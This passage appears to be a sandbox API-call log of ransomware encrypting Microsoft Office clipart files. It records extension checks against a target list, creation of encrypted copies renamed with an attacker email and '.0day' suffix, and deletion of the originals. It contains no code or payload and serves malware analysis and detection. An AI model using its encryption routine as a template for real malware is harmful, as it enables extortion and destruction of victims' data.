[0274.100] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.100] lstrlenW (lpString=".ppt") returned 4 [0274.100] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.100] lstrlenW (lpString=".zip") returned 4 [0274.100] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.100] lstrlenW (lpString=".rar") returned 4 [0274.100] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString=".bz2") returned 4 [0274.100] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString=".7z") returned 3 [0274.100] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.100] lstrlenW (lpString=".dbf") returned 4 [0274.100] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.100] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.100] lstrlenW (lpString=".1cd") returned 4 [0274.100] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".jpg") returned 4 [0274.101] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".doc") returned 4 [0274.101] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString=".docx") returned 5 [0274.101] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.101] lstrlenW (lpString=".pdf") returned 4 [0274.101] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString=".xls") returned 4 [0274.101] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.101] lstrlenW (lpString=".xlsx") returned 5 [0274.101] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.101] lstrlenW (lpString=".ppt") returned 4 [0274.101] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".zip") returned 4 [0274.101] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.101] lstrlenW (lpString=".rar") returned 4 [0274.101] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString=".bz2") returned 4 [0274.101] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString=".7z") returned 3 [0274.101] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".dbf") returned 4 [0274.101] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".1cd") returned 4 [0274.101] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.101] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0274.101] lstrlenW (lpString=".jpg") returned 4 [0274.101] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.102] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.102] lstrlenW (lpString="DD01169_.WMF") returned 12 [0274.102] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.154] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2020) returned 1 [0274.154] CloseHandle (hObject=0x318) returned 1 [0274.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 0x20 [0274.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.241] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.241] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.280] GetLastError () returned 0x0 [0274.280] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x7e4, lpOverlapped=0x0) returned 1 [0274.284] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0274.285] ReadFile (in: hFile=0x2c4, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.285] WriteFile (in: hFile=0x390, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.285] SetEndOfFile (hFile=0x390) returned 1 [0274.285] CloseHandle (hObject=0x390) returned 1 [0274.285] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.285] SetEndOfFile (hFile=0x2c4) returned 1 [0274.287] CloseHandle (hObject=0x2c4) returned 1 [0274.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.587] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf")) returned 1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString=".doc") returned 4 [0274.629] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString=".docx") returned 5 [0274.629] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.629] lstrlenW (lpString=".pdf") returned 4 [0274.629] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString=".xls") returned 4 [0274.629] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.629] lstrlenW (lpString=".xlsx") returned 5 [0274.629] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.629] lstrlenW (lpString=".ppt") returned 4 [0274.629] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString=".zip") returned 4 [0274.629] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.629] lstrlenW (lpString=".rar") returned 4 [0274.629] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString=".bz2") returned 4 [0274.629] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString=".7z") returned 3 [0274.629] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString=".dbf") returned 4 [0274.629] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString=".1cd") returned 4 [0274.629] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString=".jpg") returned 4 [0274.629] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.629] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.630] lstrlenW (lpString=".doc") returned 4 [0274.630] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString=".docx") returned 5 [0274.630] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.630] lstrlenW (lpString=".pdf") returned 4 [0274.630] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString=".xls") returned 4 [0274.630] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.630] lstrlenW (lpString=".xlsx") returned 5 [0274.630] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.630] lstrlenW (lpString=".ppt") returned 4 [0274.630] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.630] lstrlenW (lpString=".zip") returned 4 [0274.630] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.630] lstrlenW (lpString=".rar") returned 4 [0274.630] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString=".bz2") returned 4 [0274.630] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString=".7z") returned 3 [0274.630] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.630] lstrlenW (lpString=".dbf") returned 4 [0274.630] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.630] lstrlenW (lpString=".1cd") returned 4 [0274.630] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.630] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF") returned 63 [0274.630] lstrlenW (lpString=".jpg") returned 4 [0274.630] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.630] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.631] lstrlenW (lpString="DD01172_.WMF") returned 12 [0274.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.631] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2232) returned 1 [0274.631] CloseHandle (hObject=0x390) returned 1 [0274.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 0x20 [0274.631] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.631] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.631] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.632] GetLastError () returned 0x0 [0274.632] ReadFile (in: hFile=0x390, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x8b8, lpOverlapped=0x0) returned 1 [0274.640] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0274.641] ReadFile (in: hFile=0x390, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.641] WriteFile (in: hFile=0x2cc, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.641] SetEndOfFile (hFile=0x2cc) returned 1 [0274.789] CloseHandle (hObject=0x2cc) returned 1 [0274.789] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.789] SetEndOfFile (hFile=0x390) returned 1 [0274.791] CloseHandle (hObject=0x390) returned 1 [0274.791] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.830] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 1 [0274.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.859] lstrlenW (lpString=".doc") returned 4 [0274.859] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.859] lstrlenW (lpString=".docx") returned 5 [0274.859] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.859] lstrlenW (lpString=".pdf") returned 4 [0274.859] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.859] lstrlenW (lpString=".xls") returned 4 [0274.859] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.859] lstrlenW (lpString=".xlsx") returned 5 [0274.859] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.859] lstrlenW (lpString=".ppt") returned 4 [0274.859] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.859] lstrlenW (lpString=".zip") returned 4 [0274.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.859] lstrlenW (lpString=".rar") returned 4 [0274.859] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.859] lstrlenW (lpString=".bz2") returned 4 [0274.859] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString=".7z") returned 3 [0274.860] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString=".dbf") returned 4 [0274.860] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString=".1cd") returned 4 [0274.860] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString=".jpg") returned 4 [0274.860] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString=".doc") returned 4 [0274.860] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString=".docx") returned 5 [0274.860] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.860] lstrlenW (lpString=".pdf") returned 4 [0274.860] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString=".xls") returned 4 [0274.860] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.860] lstrlenW (lpString=".xlsx") returned 5 [0274.860] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.860] lstrlenW (lpString=".ppt") returned 4 [0274.860] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.860] lstrlenW (lpString=".zip") returned 4 [0274.860] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.860] lstrlenW (lpString=".rar") returned 4 [0274.860] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString=".bz2") returned 4 [0274.860] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.860] lstrlenW (lpString=".7z") returned 3 [0274.860] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.861] lstrlenW (lpString=".dbf") returned 4 [0274.861] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.861] lstrlenW (lpString=".1cd") returned 4 [0274.861] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.861] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63 [0274.861] lstrlenW (lpString=".jpg") returned 4 [0274.861] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.861] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.861] lstrlenW (lpString="DD01586_.WMF") returned 12 [0274.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.861] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d2ff1c | out: lpFileSize=0x2d2ff1c*=2324) returned 1 [0274.861] CloseHandle (hObject=0x384) returned 1 [0274.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 0x20 [0274.861] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.861] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.862] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.862] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.862] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.862] GetLastError () returned 0x0 [0274.862] ReadFile (in: hFile=0x384, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x914, lpOverlapped=0x0) returned 1 [0274.902] WriteFile (in: hFile=0x39c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0x920, lpOverlapped=0x0) returned 1 [0274.903] ReadFile (in: hFile=0x384, lpBuffer=0x30f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d2fed4, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesRead=0x2d2fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.903] WriteFile (in: hFile=0x39c, lpBuffer=0x30f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d2fc9c, lpOverlapped=0x0 | out: lpBuffer=0x30f0020*, lpNumberOfBytesWritten=0x2d2fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.903] SetEndOfFile (hFile=0x39c) returned 1 [0274.903] CloseHandle (hObject=0x39c) returned 1 [0274.903] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d2fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.903] SetEndOfFile (hFile=0x384) returned 1 [0274.905] CloseHandle (hObject=0x384) returned 1 [0274.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01586_.wmf")) returned 1 [0274.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.991] lstrlenW (lpString=".doc") returned 4 [0274.991] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.991] lstrlenW (lpString=".docx") returned 5 [0274.991] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.991] lstrlenW (lpString=".pdf") returned 4 [0274.991] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.991] lstrlenW (lpString=".xls") returned 4 [0274.991] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.991] lstrlenW (lpString=".xlsx") returned 5 [0274.991] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.991] lstrlenW (lpString=".ppt") returned 4 [0274.991] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01586_.WMF") returned 63 [0274.991] lstrlenW (lpString=".zip") returned 4 [0274.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.991] lstrlenW (lpString=".rar") returned 4 [0274.992] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".bz2") returned 4 [0274.992] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.992] lstrlenW (lpString=".7z") returned 3 [0274.992] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.992] 